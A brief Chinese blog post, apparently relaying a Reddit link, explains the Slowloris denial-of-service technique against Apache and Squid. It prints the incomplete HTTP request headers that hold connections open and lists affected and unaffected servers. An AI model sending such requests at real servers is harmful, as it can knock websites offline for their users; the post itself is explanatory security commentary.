reddit上看到,原始文章是ha.ckers.org的slowloris.pl(下载),基本原理就是
It basically uses a concept of keeping an HTTP session alive indefinitely (or as long as possible) and repeating that process a few hundred times
发包如下:
GET / HTTP/1.1\r\n
Host: host\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n
Content-Length: 42\r\n
X-a: b\r\n
还可以针对注意这里没有\r\n\r\n结束HTTP头。可怜的Apache/Squid就一直等待啊等待。
貌似这种方法也比较老了。
Apache 1.x and 2.x are affected as well as Squid, Microsoft IIS 6.0 or 7.0, lighttpd are not affected.